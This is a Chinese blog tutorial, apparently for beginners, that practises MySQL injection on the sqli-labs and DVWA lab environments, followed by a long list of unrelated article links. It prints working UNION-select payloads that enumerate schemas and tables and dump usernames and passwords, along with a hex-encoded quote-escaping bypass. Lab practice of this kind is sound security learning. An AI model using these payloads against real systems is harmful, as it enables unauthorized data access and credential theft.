首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
MySQL kill不掉线程的原因
May 07 MySQL
mysql5.7使用binlog 恢复数据的方法
Jun 03 MySQL
MySQL中的布尔值,怎么存储false或true
Jun 04 MySQL
mysql 带多个条件的查询方式
Jun 05 MySQL
Mysql中一千万条数据怎么快速查询
Dec 06 MySQL
MySQL七大JOIN的具体使用
Feb 28 MySQL
一条慢SQL语句引发的改造之路
Mar 16 MySQL
mysql数据插入覆盖和时间戳的问题及解决
Mar 25 MySQL
优化Mysql查询的示例
Apr 26 MySQL
MySQL 数据表操作
May 04 MySQL
MySQL 数据库 增删查改、克隆、外键 等操作
May 11 MySQL
MySQL表字段数量限制及行大小限制详情
Jul 23 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
道歉信(39) 表扬信(62) 介绍信(57) 欢迎词(65) 教学反思(909) 辞职信(98) 邀请函(127) 事迹材料(636) 广播稿(323) 检讨书(456)
You might like
自己做矿石收音机
2021/03/02 无线电
咖啡的传说和历史
2021/03/03 新手入门
压力如何影响浓缩咖啡品质
2021/03/03 咖啡文化
NT IIS下用ODBC连接数据库
2006/10/09 PHP
php中将网址转换为超链接的函数
2011/09/02 PHP
php字符串过滤与替换小结
2015/01/26 PHP
php生成Android客户端扫描可登录的二维码
2016/05/13 PHP
phpStudy2016 配置多个域名期间遇到的问题小结
2017/10/19 PHP
在chrome浏览器中,防止input[text]和textarea在聚焦时出现黄色边框的解决方法
2011/05/24 Javascript
js点击页面其它地方将某个显示的DIV隐藏
2012/07/12 Javascript
js正文内容高亮效果的实现方法
2013/06/30 Javascript
js读写cookie实现一个底部广告浮层效果的两种方法
2013/12/29 Javascript
让浏览器DOM元素最后加载的js方法
2014/07/29 Javascript
sogou地图API用法实例教程
2014/09/11 Javascript
Flow之一个新的Javascript静态类型检查器
2015/12/21 Javascript
微信公众号 客服接口的开发实例详解
2016/09/28 Javascript
BOM之navigator对象和用户代理检测
2017/02/10 Javascript
vue+webpack dev本地调试全局样式引用失效的解决方案
2019/11/12 Javascript
在Python中过滤Windows文件名中的非法字符方法
2019/06/10 Python
Python PIL图片添加字体的例子
2019/08/22 Python
python orm 框架中sqlalchemy用法实例详解
2020/02/02 Python
python读取hdfs上的parquet文件方式
2020/06/06 Python
KIKO比利时官网:意大利彩妆品牌
2017/07/23 全球购物
聪明的粉丝购买门票的地方:TickPick
2018/03/09 全球购物
路由表示做什么用的?在linux环境中怎么来配置一条默认路由?
2013/06/07 面试题
自荐书模板
2013/12/19 职场文书
综合实践活动方案
2014/02/14 职场文书
开业主持词
2014/03/21 职场文书
广播体操口号
2014/06/18 职场文书
交通安全责任书范本
2014/07/24 职场文书
关于旅游的活动方案
2014/08/15 职场文书
单方离婚协议书范本(2014版)
2014/09/30 职场文书
忠犬八公的故事观后感
2015/06/05 职场文书
2016八一建军节慰问信
2015/11/30 职场文书
话题作文之学会尊重
2019/12/16 职场文书
Window server 2012 R2 AD域的组策略相关设置
2022/04/28 Servers